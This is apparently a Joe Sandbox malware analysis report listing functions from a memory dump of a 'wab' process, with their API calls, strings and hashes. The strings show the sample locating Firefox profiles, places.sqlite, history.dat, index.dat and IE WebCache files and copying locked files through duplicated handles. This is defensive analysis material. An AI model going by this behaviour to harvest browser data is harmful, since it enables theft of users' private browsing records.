                    Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 2941347001-0
                    • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                    • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                    Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00403C09
                    • memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                    • wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                    • wcscat.MSVCRT ref: 00403C70
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscat$Closewcscpywcslen
                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                    • API String ID: 3249829328-1174173950
                    • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                    • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                    Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040A824
                    • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                    • wcscpy.MSVCRT ref: 0040A854
                    • wcscat.MSVCRT ref: 0040A86A
                    • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                    • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                    • String ID:
                    • API String ID: 669240632-0
                    • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                    • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                    Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                    Download Yara Rule
                    APIs
                    • wcschr.MSVCRT ref: 00414458
                    • _snwprintf.MSVCRT ref: 0041447D
                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                    • String ID: "%s"
                    • API String ID: 1343145685-3297466227
                    • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                    • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                    Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcProcessTimes
                    • String ID: GetProcessTimes$kernel32.dll
                    • API String ID: 1714573020-3385500049
                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                    Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 004087D6
                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                    • memset.MSVCRT ref: 00408828
                    • memset.MSVCRT ref: 00408840
                    • memset.MSVCRT ref: 00408858
                    • memset.MSVCRT ref: 00408870
                    • memset.MSVCRT ref: 00408888
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                    • String ID:
                    • API String ID: 2911713577-0
                    • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                    • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcmp
                    • String ID: @ $SQLite format 3
                    • API String ID: 1475443563-3708268960
                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                    Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                    • memset.MSVCRT ref: 00414C87
                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                    • wcscpy.MSVCRT ref: 00414CFC
                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                    Strings
                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressCloseProcVersionmemsetwcscpy
                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                    • API String ID: 2705122986-2036018995
                    • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                    • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: _wcsicmpqsort
                    • String ID: /nosort$/sort
                    • API String ID: 1579243037-1578091866
                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                    Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 0040E60F
                    • memset.MSVCRT ref: 0040E629
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                    Strings
                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                    • API String ID: 3354267031-2114579845
                    • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                    • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                    Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                    Download Yara Rule
                    APIs
                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                    • LockResource.KERNEL32(00000000), ref: 004148EF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: Resource$FindLoadLockSizeof
                    • String ID:
                    • API String ID: 3473537107-0
                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                    Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset
                    • String ID: only a single result allowed for a SELECT that is part of an expression
                    • API String ID: 2221118986-1725073988
                    • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                    • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                    Function 004175B7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNEL32(00000064), ref: 004175D0
                    • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ChangeCloseFindNotificationSleep
                    • String ID: }A
                    • API String ID: 1821831730-2138825249
                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                    Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@DeleteObject
                    • String ID: r!A
                    • API String ID: 1103273653-628097481
                    • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                    • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??2@
                    • String ID:
                    • API String ID: 1033339047-0
                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                    Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                    • memcmp.MSVCRT ref: 00444BA5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$memcmp
                    • String ID: $$8
                    • API String ID: 2808797137-435121686
                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                    Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                    • String ID:
                    • API String ID: 1042154641-0
                    • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                    • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                    Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                    • memset.MSVCRT ref: 00403A55
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                    • String ID: history.dat$places.sqlite
                    • API String ID: 3093078384-467022611
                    • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                    • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                    Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                    • GetLastError.KERNEL32 ref: 00417627
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ErrorLast$File$PointerRead
                    • String ID:
                    • API String ID: 839530781-0
                    • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                    • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID: *.*$index.dat
                    • API String ID: 1974802433-2863569691
                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                    Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                    Similarity
                    • API ID: ??3@mallocmemcpy
                    • String ID:
                    • API String ID: 3831604043-0
                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
